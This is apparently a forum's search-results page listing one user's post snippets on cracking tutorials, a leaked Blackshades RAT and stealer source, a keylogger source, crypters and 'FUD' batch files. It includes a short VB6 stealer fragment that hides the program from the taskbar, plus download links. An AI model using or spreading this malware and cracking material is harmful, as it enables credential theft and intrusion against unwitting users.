Search results

  1. [Reverse Engineering][Cracking Programs!] Best Starters Pack! [FREE]

    No that's not bad. Honestly just keep google open beside you, and start learning. If you come across a term that you don't understand 100% what it means then google it, and read up about it for a while. It might take you a while, but you'll learn SOOOOO much; and tbqh Reverse Engineering...
  2. [TUT] How To Make Your Internet Browser Show Password Fields [Javascript]

    It's a weird little trick. Basically this is for those censored out password fields.
  3. [Reverse Engineering][Cracking Programs!] Best Starters Pack! [FREE]

    As the title reads, here's a few tutorials on cracking applications, which Include the following: Serial Fishing Internal keygen and patching Unpacking and patching Inline patching packers theory Cracking using memory breakpoints breakpoints theory Defeating magicByte protection...
  4. [LEAK] Blackshades RAT Source Code [LEAK][VB6]

    The file is too big for an attachment so I uploaded it to megaupload. http://www.megaupload.com/?d=W0A160RC
  5. [LEAK] Blackshades Stealer Source Code [VB6]

    Forms: frmMain fSteam ----------------------------------------- frmMain_Load: Private Sub Form_Load() On Error Resume Next App.TaskVisible = 0 Me.Hide Me.global_52 = CStr(String(&H104, Chr(0))) MemVar_420078 = PC_INFO_GET() Me.global_52 = DIR_ME() & "\" & App.EXEName & ".exe"...
  6. Wincrypter 1.8

    Try logging in with random details, or nothing entered in the text fields.
  7. [VB.NET SOURCE] Classical's Polymorphic CodeDOM Keylogger [SOURCE]

    It's not actually polymorphic as polymorphism is impossible (at this time) in .NET Framework based languages, so I don't know why Classical named it that :/ It's more of a dynamic encryption, anywho it's fully commented so hopefully you can learn from it...
  8. [Reverse Engineering] How to Crack .NET License Checks [eBook]

    http://www.mediafire.com/?a2itcpp86vlqkdt
  9. Help me with batch ftp

    They may be FUD to AV's, but I don't know a single sane person who'd execute a stray .bat file. Either way I suggest you to find an alternative language to complete this project, unless you figure out a way to obfuscate batch script. OT Though, the script looks fine to me; so I don't know what...
  10. VB.Net Tuts

    Java's library isn't really similar to either, I was talking about the similarities in programming syntax between C#, and Java.
  11. Hey

    That's most likely it ;P Either way welcome, and nice to see you again.
  12. VB.Net Tuts

    I've updated my post with some advice. And I recommend you don't learn C# after VB.NET, you should go directly into Java. By the time your done Java, you pretty much already know C#; as C# is often considered similar to Java's syntax, and similar to VB.NET's library. From there, learn...
  13. VB.Net Tuts

    It depends if you want to learn it thoroughly; or just be a skid, and go c+p a program right after you learn a moderate amount of the language. EDIT: If you actually want to learn it thoroughly do what I did: Study, and practice all of "Teach Me Computer." Study, and practice all of...
  14. Hey

    Hey Alex welcome to Rune Revolution. For some reason your name sounds realllllly familiar. Anyways welcome : )
  15. Malware Bytes Tells All, Or Does It?

    Sure send it to me, although that won't prove much in the eyes of a skeptic.
  16. [TUT] How To Make Your Internet Browser Show Password Fields [Javascript]

    Put the above into your URL Bar, and hit enter. Tada. NOTE: Most modern browsers won't accept this javascript so you have to bookmark it then use the bookmark while on the site.
  17. Game Development - VB.Net

    Haven't looked through the content, but the title seems promising. http://www.dutchthewiz.com/vb/games/
  18. Malware Bytes Tells All, Or Does It?

    I'll decompile it, and see if there's any malicious functions. However if he's using a simple ProcessorID HWID system then that is most likely tripping MalwareBytes. (as it's attempting to connect to a remote host without your knowledge)
Back
Top